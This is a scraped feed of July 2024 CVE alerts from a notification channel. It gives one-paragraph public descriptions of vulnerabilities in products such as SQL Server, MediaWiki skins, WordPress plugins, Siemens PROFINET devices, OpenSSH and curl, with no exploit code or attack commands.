🚨 CVE-2024-21308SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:30 |
🚨 CVE-2024-21303SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:27 |
🚨 CVE-2024-20701SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:26 |
🚨 CVE-2024-39021idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/vpsApiData_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-09 17:37:25 |
🚨 CVE-2024-4467A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.🎖@cveNotify |
|
| 2024-07-09 17:07:30 |
🚨 CVE-2024-40604An issue was discovered in the Nimbus skin for MediaWiki through 1.42.1. There is Stored XSS via MediaWiki:Nimbus-sidebar menu and submenu entries.🎖@cveNotify |
|
| 2024-07-09 17:07:26 |
🚨 CVE-2024-40600An issue was discovered in the Metrolook skin for MediaWiki through 1.42.1. There is stored XSS via MediaWiki:Sidebar top-level menu entries.🎖@cveNotify |
|
| 2024-07-09 17:07:25 |
🚨 CVE-2024-40598An issue was discovered in the CheckUser extension for MediaWiki through 1.42.1. The API can expose suppressed information for log events. (The log_deleted attribute is not applied to entries.)🎖@cveNotify |
|
| 2024-07-09 17:07:24 |
🚨 CVE-2024-40596An issue was discovered in the CheckUser extension for MediaWiki through 1.42.1. The Special:Investigate feature can expose suppressed information for log events. (TimelineService does not support properly suppressing.)🎖@cveNotify |
|
| 2024-07-09 16:37:26 |
🚨 CVE-2021-47389In the Linux kernel, the following vulnerability has been resolved:KVM: SVM: fix missing sev_decommission in sev_receive_startDECOMMISSION the current SEV context if binding an ASID fails afterRECEIVE_START. Per AMD's SEV API, RECEIVE_START generates a new guestcontext and thus needs to be paired with DECOMMISSION: The RECEIVE_START command is the only command other than the LAUNCH_START command that generates a new guest context and guest handle.The missing DECOMMISSION can result in subsequent SEV launch failures,as the firmware leaks memory and might not able to allocate more SEVguest contexts in the future.Note, LAUNCH_START suffered the same bug, but was previously fixed bycommit 934002cd660b ("KVM: SVM: Call SEV Guest Decommission if ASIDbinding fails").🎖@cveNotify |
|
| 2024-07-09 16:37:25 |
🚨 CVE-2024-30878A cross-site scripting (XSS) vulnerability in RageFrame2 v2.6.43, allows remote attackers to execute arbitrary web scripts or HTML and obtain sensitive information via a crafted payload injected into the upload_drive parameter.🎖@cveNotify |
|
| 2024-07-09 16:37:24 |
🚨 CVE-2023-5322** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been rated as critical. Affected by this issue is some unknown functionality of the file /sysmanage/edit_manageadmin.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240992. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-07-09 16:07:26 |
🚨 CVE-2024-5942The Page and Post Clone plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.0 via the 'content_clone' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to clone and read private posts.🎖@cveNotify |
|
| 2024-07-09 16:07:25 |
🚨 CVE-2024-30285Audition versions 24.2, 23.6.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service condition. An attacker could exploit this vulnerability to crash the application, leading to a denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-09 16:07:24 |
🚨 CVE-2024-30276Audition versions 24.2, 23.6.4 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-09 15:07:25 |
🚨 CVE-2024-39695Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 version v0.28.2. The vulnerability is in the parser for the ASF video format, which was a new feature in v0.28.0. The out-of-bounds read is triggered when Exiv2 is used to read the metadata of a crafted video file. The bug is fixed in version v0.28.3.🎖@cveNotify |
|
| 2024-07-09 15:07:24 |
🚨 CVE-2024-39203A cross-site scripting (XSS) vulnerability in the Backend Theme Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2024-07-09 14:37:35 |
🚨 CVE-2024-6598A denial-of-service attack is possible through the execution functionality of KNIME Business Hub 1.10.0 and 1.10.1. It allows an authenticated attacker with job execution privileges to execute a job that causes internal messages to pile up until there are no more resources available for processing new messages. This leads to an outage of most functionality of KNIME Business Hub. Recovery from the situation is only possible by manual administrator interaction. Please contact our support for instructions in case you have run into this situation.Updating to KNIME Business Hub 1.10.2 or later solves the problem.🎖@cveNotify |
|
| 2024-07-09 14:37:31 |
🚨 CVE-2024-2177A Cross Window Forgery vulnerability exists within GitLab CE/EE affecting all versions from 16.3 prior to 16.11.5, 17.0 prior to 17.0.3, and 17.1 prior to 17.1.1. This condition allows for an attacker to abuse the OAuth authentication flow via a crafted payload.🎖@cveNotify |
|
| 2024-07-09 14:37:30 |
🚨 CVE-2024-6564Buffer overflow in "rcar_dev_init" due to using due to using untrusted data (rcar_image_number) as a loop counter before verifying it against RCAR_MAX_BL3X_IMAGE. This could lead to a full bypass of secure boot.🎖@cveNotify |
|
| 2024-07-09 14:37:26 |
🚨 CVE-2024-6563Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Renesas arm-trusted-firmware allows Local Execution of Code. This vulnerability is associated with program files https://github.Com/renesas-rcar/arm-trusted-firmware/blob/rcar_gen3_v2.5/drivers/renesas/common/io/i... https://github.Com/renesas-rcar/arm-trusted-firmware/blob/rcar_gen3_v2.5/drivers/renesas/common/io/io_rcar.C .In line 313 "addr_loaded_cnt" is checked not to be "CHECK_IMAGE_AREA_CNT" (5) or larger, this check does not halt the function. Immediately after (line 317) there will be an overflow in the buffer and the value of "dst" will be written to the area immediately after the buffer, which is "addr_loaded_cnt". This will allow an attacker to freely control the value of "addr_loaded_cnt" and thus control the destination of the write immediately after (line 318). The write in line 318 will then be fully controlled by said attacker, with whichever address and whichever value ("len") they desire.🎖@cveNotify |
|
| 2024-07-09 14:37:25 |
🚨 CVE-2023-38545This flaw makes curl overflow a heap based buffer in the SOCKS5 proxyhandshake.When curl is asked to pass along the host name to the SOCKS5 proxy to allowthat to resolve the address instead of it getting done by curl itself, themaximum length that host name can be is 255 bytes.If the host name is detected to be longer, curl switches to local nameresolving and instead passes on the resolved address only. Due to this bug,the local variable that means "let the host resolve the name" could get thewrong value during a slow SOCKS5 handshake, and contrary to the intention,copy the too long host name to the target buffer instead of copying just theresolved address there.The target buffer being a heap based buffer, and the host name coming from theURL that curl has been told to operate with.🎖@cveNotify |
|
| 2024-07-09 14:37:24 |
🚨 CVE-2022-47554Exposure of sensitive information in ekorCCP and ekorRCI, potentially allowing a remote attacker to obtain critical information from various .xml files, including .xml files containing credentials, without being authenticated within the web server.🎖@cveNotify |
|
| 2024-07-09 13:37:29 |
🚨 CVE-2024-37952Improper Privilege Management vulnerability in themeenergy BookYourTravel allows Privilege Escalation.This issue affects BookYourTravel: from n/a through 8.18.17.🎖@cveNotify |
|
| 2024-07-09 13:37:26 |
🚨 CVE-2024-37934Improper Control of Generation of Code ('Code Injection') vulnerability in Saturday Drive Ninja Forms allows Code Injection.This issue affects Ninja Forms: from n/a through 3.8.4.🎖@cveNotify |
|
| 2024-07-09 13:37:25 |
🚨 CVE-2024-22271In Spring Cloud Function framework, versions 4.1.x prior to 4.1.2, 4.0.x prior to 4.0.8 an application is vulnerable to a DOS attack when attempting to compose functions with non-existing functions.Specifically, an application is vulnerable when all of the following are true:User is using Spring Cloud Function Web moduleAffected Spring Products and Versions Spring Cloud Function Framework 4.1.0 to 4.1.2 4.0.0 to 4.0.8References https://spring.io/security/cve-2022-22979 https://checkmarx.com/blog/spring-function-cloud-dos-cve-2022-22979-and-unintended-function-invocation/ History 2020-01-16: Initial vulnerability report published.🎖@cveNotify |
|
| 2024-07-09 13:37:24 |
🚨 CVE-2024-28882OpenVPN from 2.6.0 through 2.6.10 in a server role accepts multiple exit notifications from authenticated clients which will extend the validity of a closing session🎖@cveNotify |
|
| 2024-07-09 12:37:31 |
🚨 CVE-2022-25622The PROFINET (PNIO) stack, when integrated with the Interniche IP stack, improperly handles internal resources for TCP segments where the minimum TCP-Header length is less than defined.This could allow an attacker to create a denial of service condition for TCP services on affected devices by sending specially crafted TCP segments.🎖@cveNotify |
|
| 2024-07-09 12:37:30 |
🚨 CVE-2019-19300A vulnerability has been identified in Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200, Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P, KTK ATE530S, SIDOOR ATD430W, SIDOOR ATE530S COATED, SIDOOR ATE531S, SIMATIC ET 200AL IM 157-1 PN (6ES7157-1AB00-0AB0), SIMATIC ET 200MP IM 155-5 PN HF (6ES7155-5AA00-0AC0), SIMATIC ET 200pro IM 154-8 PN/DP CPU (6ES7154-8AB01-0AB0), SIMATIC ET 200pro IM 154-8F PN/DP CPU (6ES7154-8FB01-0AB0), SIMATIC ET 200pro IM 154-8FX PN/DP CPU (6ES7154-8FX00-0AB0), SIMATIC ET 200S IM 151-8 PN/DP CPU (6ES7151-8AB01-0AB0), SIMATIC ET 200S IM 151-8F PN/DP CPU (6ES7151-8FB01-0AB0), SIMATIC ET 200SP IM 155-6 MF HF (6ES7155-6MU00-0CN0), SIMATIC ET 200SP IM 155-6 PN HA (incl. SIPLUS variants), SIMATIC ET 200SP IM 155-6 PN HF (6ES7155-6AU00-0CN0), SIMATIC ET 200SP IM 155-6 PN/2 HF (6ES7155-6AU01-0CN0), SIMATIC ET 200SP IM 155-6 PN/3 HF (6ES7155-6AU30-0CN0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants), SIMATIC ET200ecoPN, AI 8xRTD/TC, M12-L (6ES7144-6JF00-0BB0), SIMATIC ET200ecoPN, CM 4x IO-Link, M12-L (6ES7148-6JE00-0BB0), SIMATIC ET200ecoPN, CM 8x IO-Link, M12-L (6ES7148-6JG00-0BB0), SIMATIC ET200ecoPN, CM 8x IO-Link, M12-L (6ES7148-6JJ00-0BB0), SIMATIC ET200ecoPN, DI 16x24VDC, M12-L (6ES7141-6BH00-0BB0), SIMATIC ET200ecoPN, DI 8x24VDC, M12-L (6ES7141-6BG00-0BB0), SIMATIC ET200ecoPN, DIQ 16x24VDC/2A, M12-L (6ES7143-6BH00-0BB0), SIMATIC ET200ecoPN, DQ 8x24VDC/0,5A, M12-L (6ES7142-6BG00-0BB0), SIMATIC ET200ecoPN, DQ 8x24VDC/2A, M12-L (6ES7142-6BR00-0BB0), SIMATIC MICRO-DRIVE PDC, SIMATIC PN/MF Coupler (6ES7158-3MU10-0XA0), SIMATIC PN/PN Coupler (6ES7158-3AD10-0XA0), SIMATIC S7-1200 CPU family (incl. SIPLUS variants), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants), SIMATIC S7-1500 Software Controller, SIMATIC S7-300 CPU 314C-2 PN/DP (6ES7314-6EH04-0AB0), SIMATIC S7-300 CPU 315-2 PN/DP (6ES7315-2EH14-0AB0), SIMATIC S7-300 CPU 315F-2 PN/DP (6ES7315-2FJ14-0AB0), SIMATIC S7-300 CPU 315T-3 PN/DP (6ES7315-7TJ10-0AB0), SIMATIC S7-300 CPU 317-2 PN/DP (6ES7317-2EK14-0AB0), SIMATIC S7-300 CPU 317F-2 PN/DP (6ES7317-2FK14-0AB0), SIMATIC S7-300 CPU 317T-3 PN/DP (6ES7317-7TK10-0AB0), SIMATIC S7-300 CPU 317TF-3 PN/DP (6ES7317-7UL10-0AB0), SIMATIC S7-300 CPU 319-3 PN/DP (6ES7318-3EL01-0AB0), SIMATIC S7-300 CPU 319F-3 PN/DP (6ES7318-3FL01-0AB0), SIMATIC S7-400 H V6 and below CPU family (incl. SIPLUS variants), SIMATIC S7-400 PN/DP V7 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V8 CPU family (incl. SIPLUS variants), SIMATIC TDC CP51M1, SIMATIC TDC CPU555, SIMATIC WinAC RTX 2010 (6ES7671-0RC08-0YA0), SIMATIC WinAC RTX F 2010 (6ES7671-1RC08-0YA0), SINAMICS S/G Control Unit w. PROFINET, SIPLUS ET 200MP IM 155-5 PN HF (6AG1155-5AA00-2AC0), SIPLUS ET 200MP IM 155-5 PN HF (6AG1155-5AA00-7AC0), SIPLUS ET 200MP IM 155-5 PN HF T1 RAIL (6AG2155-5AA00-1AC0), SIPLUS ET 200S IM 151-8 PN/DP CPU (6AG1151-8AB01-7AB0), SIPLUS ET 200S IM 151-8F PN/DP CPU (6AG1151-8FB01-2AB0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU00-2CN0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU00-4CN0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU01-2CN0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU01-7CN0), SIPLUS ET 200SP IM 155-6 PN HF T1 RAIL (6AG2155-6AU00-1CN0), SIPLUS ET 200SP IM 155-6 PN HF T1 RAIL (6AG2155-6AU01-1CN0), SIPLUS ET 200SP IM 155-6 PN HF TX RAIL (6AG2155-6AU01-4CN0), SIPLUS NET PN/PN Coupler (6AG2158-3AD10-4XA0), SIPLUS S7-300 CPU 314C-2 PN/DP (6AG1314-6EH04-7AB0), SIPLUS S7-300 CPU 315-2 PN/DP (6AG1315-2EH14-7AB0), SIPLUS S7-300 CPU 315F-2 PN/DP (6AG1315-2FJ14-2AB0), SIPLUS S7-300 CPU 317-2 PN/DP (6AG1317-2EK14-7AB0), SIPLUS S7-300 CPU 317F-2 PN/DP (6AG1317-2FK14-2AB0). The Interniche-based TCP Stack can be forced to make very expensive calls for every incoming packet which can lead to a denial of service.🎖@cveNotify |
|
| 2024-07-09 12:37:27 |
🚨 CVE-2019-13946Profinet-IO (PNIO) stack versions prior V06.00 do not properly limitinternal resource allocation when multiple legitimate diagnostic packagerequests are sent to the DCE-RPC interface.This could lead to a denial of service condition due to lack of memoryfor devices that include a vulnerable version of the stack.The security vulnerability could be exploited by an attacker with networkaccess to an affected device. Successful exploitation requires no systemprivileges and no user interaction. An attacker could use the vulnerabilityto compromise the availability of the device.🎖@cveNotify |
|
| 2024-07-09 12:37:26 |
🚨 CVE-2017-2681Specially crafted PROFINET DCP packets sent on a local Ethernet segment (Layer 2) to an affected product could cause a denial of service condition of that product. Human interaction is required to recover the system. PROFIBUS interfaces are not affected. This vulnerability affects only SIMATIC HMI Multi Panels and HMI Mobile Panels, and S7-300/S7-400 devices.🎖@cveNotify |
|
| 2024-07-09 12:37:25 |
🚨 CVE-2017-2680Specially crafted PROFINET DCP broadcast packets could cause a denial of service condition of affected products on a local Ethernet segment (Layer 2). Human interaction is required to recover the systems. PROFIBUS interfaces are not affected.🎖@cveNotify |
|
| 2024-07-09 11:37:44 |
🚨 CVE-2024-37418Unrestricted Upload of File with Dangerous Type vulnerability in Andy Moyle Church Admin allows Upload a Web Shell to a Web Server.This issue affects Church Admin: from n/a through 4.4.6.🎖@cveNotify |
|
| 2024-07-09 11:37:38 |
🚨 CVE-2024-37410Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Beaver Addons PowerPack Lite for Beaver Builder allows Path Traversal.This issue affects PowerPack Lite for Beaver Builder: from n/a through 1.3.0.3.🎖@cveNotify |
|
| 2024-07-09 11:37:37 |
🚨 CVE-2023-3289A BOLA vulnerability in POST /services allows a low privileged user to create a service for any user in the system (including admin). This results in unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:36 |
🚨 CVE-2023-3287A BOLA vulnerability in POST /admins allows a low privileged user to create a high privileged user (admin) in the system. This results in privilege escalation.🎖@cveNotify |
|
| 2024-07-09 11:37:33 |
🚨 CVE-2023-3286A BOLA vulnerability in POST /secretaries allows a low privileged user to create a low privileged user (secretary) in the system. This results in unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:32 |
🚨 CVE-2023-38054A BOLA vulnerability in GET, PUT, DELETE /customers/{customerId} allows a low privileged user to fetch, modify or delete a low privileged user (customer). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:31 |
🚨 CVE-2023-38053A BOLA vulnerability in GET, PUT, DELETE /settings/{settingName} allows a low privileged user to fetch, modify or delete the settings of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:30 |
🚨 CVE-2023-38052A BOLA vulnerability in GET, PUT, DELETE /admins/{adminId} allows a low privileged user to fetch, modify or delete a high privileged user (admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:26 |
🚨 CVE-2023-38050A BOLA vulnerability in GET, PUT, DELETE /webhooks/{webhookId} allows a low privileged user to fetch, modify or delete a webhook of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:25 |
🚨 CVE-2023-38048A BOLA vulnerability in GET, PUT, DELETE /providers/{providerId} allows a low privileged user to fetch, modify or delete a privileged user (provider). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 11:37:24 |
🚨 CVE-2023-38047A BOLA vulnerability in GET, PUT, DELETE /categories/{categoryId} allows a low privileged user to fetch, modify or delete the category of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 10:37:32 |
🚨 CVE-2024-37266Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Themeum Tutor LMS allows Path Traversal.This issue affects Tutor LMS: from n/a through 2.7.1.🎖@cveNotify |
|
| 2024-07-09 10:37:26 |
🚨 CVE-2024-37253Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in WpDirectoryKit WP Directory Kit allows Code Injection.This issue affects WP Directory Kit: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-07-09 10:37:25 |
🚨 CVE-2024-35777Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Automattic WooCommerce allows Content Spoofing.This issue affects WooCommerce: from n/a through 8.9.2.🎖@cveNotify |
|
| 2024-07-09 10:37:24 |
🚨 CVE-2023-3285A BOLA vulnerability in POST /appointments allows a low privileged user to create an appointment for any user in the system (including admin). This results in unauthorized data manipulation.🎖@cveNotify |
|
| 2024-07-09 09:37:32 |
🚨 CVE-2024-37502Deserialization of Untrusted Data vulnerability in wpweb WooCommerce Social Login.This issue affects WooCommerce Social Login: from n/a through 2.6.3.🎖@cveNotify |
|
| 2024-07-09 09:37:26 |
🚨 CVE-2024-37494Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in KaineLabs Youzify.This issue affects Youzify: from n/a through 1.2.5.🎖@cveNotify |
|
| 2024-07-09 09:37:25 |
🚨 CVE-2024-37225Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Zoho Marketing Automation.This issue affects Zoho Marketing Automation: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-07-09 09:37:24 |
🚨 CVE-2024-37112Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Membership Software WishList Member X.This issue affects WishList Member X: from n/a before 3.26.7.🎖@cveNotify |
|
| 2024-07-09 08:37:38 |
🚨 CVE-2024-6321The ScrollTo Bottom plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.1.1. This is due to missing nonce validation and missing file type validation in the 'options_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-09 08:37:37 |
🚨 CVE-2024-6317The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and the plugin not properly validating a file or its path prior to deleting it in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-09 08:37:36 |
🚨 CVE-2024-6316The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and missing file type validation in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-09 08:37:32 |
🚨 CVE-2024-6313The Gutenberg Forms plugin for WordPress is vulnerable to arbitrary file uploads due to the users can specify the allowed file types in the 'upload' function in versions up to, and including, 2.2.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-07-09 08:37:31 |
🚨 CVE-2024-6309The Attachment File Icons (AF Icons) plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.3. This is due to missing nonce validation in the 'afi_overview' function and missing file type validation in the 'upload_icons' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-09 08:37:30 |
🚨 CVE-2024-6180The EventON plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eventon_import_settings' ajax action in all versions up to, and including, 2.2.15. This makes it possible for unauthenticated attackers to update plugin settings, including adding stored cross-site scripting to settings options displayed on event calendar pages.🎖@cveNotify |
|
| 2024-07-09 08:37:26 |
🚨 CVE-2024-6123The Bit Form plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'iconUpload' function in all versions up to, and including, 2.12.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-07-09 08:37:25 |
🚨 CVE-2024-37923Cross-Site Request Forgery (CSRF) vulnerability in Cliengo – Chatbot.This issue affects Cliengo – Chatbot: from n/a through 3.0.1.🎖@cveNotify |
|
| 2024-07-09 08:37:24 |
🚨 CVE-2024-37555Unrestricted Upload of File with Dangerous Type vulnerability in ZealousWeb Generate PDF using Contact Form 7.This issue affects Generate PDF using Contact Form 7: from n/a through 4.0.6.🎖@cveNotify |
|
| 2024-07-09 07:37:30 |
🚨 CVE-2024-28750A remote attacker with high privileges may use a deleting file function to inject OS commands.🎖@cveNotify |
|
| 2024-07-09 07:37:26 |
🚨 CVE-2024-28748A remote attacker with high privileges may use a reading file function to inject OS commands.🎖@cveNotify |
|
| 2024-07-09 07:37:25 |
🚨 CVE-2024-22062There is a permissions and access control vulnerability in ZXCLOUD IRAI.An attacker can elevate non-administrator permissions to administrator permissions by modifying the configuration.🎖@cveNotify |
|
| 2024-07-09 07:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-09 06:37:24 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-09 05:37:32 |
🚨 CVE-2024-37180Under certain conditions SAP NetWeaverApplication Server for ABAP and ABAP Platform allows an attacker to accessremote-enabled function module with no further authorization which wouldotherwise be restricted, the function can be used to read non-sensitiveinformation with low impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-07-09 05:37:26 |
🚨 CVE-2024-37175SAP CRM WebClient does notperform necessary authorization check for an authenticated user, resulting inescalation of privileges. This could allow an attacker to access some sensitiveinformation.🎖@cveNotify |
|
| 2024-07-09 05:37:25 |
🚨 CVE-2024-34692Due to missing verification of file type orcontent, SAP Enable Now allows an authenticated attacker to upload arbitraryfiles. These files include executables which might be downloaded and executedby the user which could host malware. On successful exploitation an attackercan cause limited impact on confidentiality and Integrity of the application.🎖@cveNotify |
|
| 2024-07-09 05:37:24 |
🚨 CVE-2024-34689WebFlow Services of SAP Business Workflow allowsan authenticated attacker to enumerate accessible HTTP endpoints in theinternal network by specially crafting HTTP requests. On successfulexploitation this can result in information disclosure. It has no impact onintegrity and availability of the application.🎖@cveNotify |
|
| 2024-07-09 04:37:31 |
🚨 CVE-2024-6365The Product Table by WBW plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'saveCustomTitle' function. This is due to missing authorization and lack of sanitization of appended data in the languages/customTitle.php file. This makes it possible for unauthenticated attackers to execute code on the server.🎖@cveNotify |
|
| 2024-07-09 04:37:30 |
🚨 CVE-2024-39597In SAP Commerce, a user can misuse the forgottenpassword functionality to gain access to a Composable Storefront B2B site forwhich early login and registration is activated, without requiring the merchantto approve the account beforehand. If the site is not configured as isolatedsite, this can also grant access to other non-isolated early login sites, evenif registration is not enabled for those other sites.🎖@cveNotify |
|
| 2024-07-09 04:37:29 |
🚨 CVE-2024-39593SAP Landscape Management allows an authenticateduser to read confidential data disclosed by the REST Provider Definitionresponse. Successful exploitation can cause high impact on confidentiality ofthe managed entities.🎖@cveNotify |
|
| 2024-07-09 04:37:26 |
🚨 CVE-2024-39592Elements of PDCE does not perform necessaryauthorization checks for an authenticated user, resulting in escalation ofprivileges.Thisallows an attacker to read sensitive information causing high impact on theconfidentiality of the application.🎖@cveNotify |
|
| 2024-07-09 04:37:25 |
🚨 CVE-2024-34685Due to weak encoding of user-controlled input inSAP NetWeaver Knowledge Management XMLEditor which allows malicious scripts canbe executed in the application, potentially leading to a Cross-Site Scripting(XSS) vulnerability. This has no impact on the availability of the applicationbut it has a low impact on its confidentiality and integrity.🎖@cveNotify |
|
| 2024-07-09 04:37:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-07-09 03:37:25 |
🚨 CVE-2024-5974A buffer overflow in WatchGuard Fireware OS could may allow an authenticated remote attacker with privileged management access to execute arbitrary code with system privileges on the firewall.This issue affects Fireware OS: from 11.9.6 through 12.10.3.🎖@cveNotify |
|
| 2024-07-09 03:37:24 |
🚨 CVE-2024-4944A local privilege escalation vlnerability in the WatchGuard Mobile VPN with SSL client on Windows enables a local user to execute arbitrary commands with elevated privileged.🎖@cveNotify |
|
| 2024-07-09 02:37:25 |
🚨 CVE-2024-34786UniFi iOS app 10.15.0 introduces a misconfiguration on 2nd Generation UniFi Access Points configured as standalone (not using UniFi Network Application) that could cause the SSID name to change and/or the WiFi Password to be removed on the 5GHz Radio.This vulnerability is fixed in UniFi iOS app 10.15.2 and later.🎖@cveNotify |
|
| 2024-07-09 02:37:24 |
🚨 CVE-2024-22020A security flaw in Node.js allows a bypass of network import restrictions.By embedding non-network imports in data URLs, an attacker can execute arbitrary code, compromising system security.Verified on various platforms, the vulnerability is mitigated by forbidding data URLs in network imports.Exploiting this flaw can violate network import security, posing a risk to developers and servers.🎖@cveNotify |
|
| 2024-07-09 00:37:24 |
🚨 CVE-2024-5549Origin Validation Error in GitHub repository stitionai/devika prior to -.🎖@cveNotify |
|
| 2024-07-08 23:37:24 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-08 22:37:25 |
🚨 CVE-2024-28882OpenVPN 2.6.10 and earlier in a server role accepts multiple exit notifications from authenticated clients which will extend the validity of a closing session🎖@cveNotify |
|
| 2024-07-08 22:37:24 |
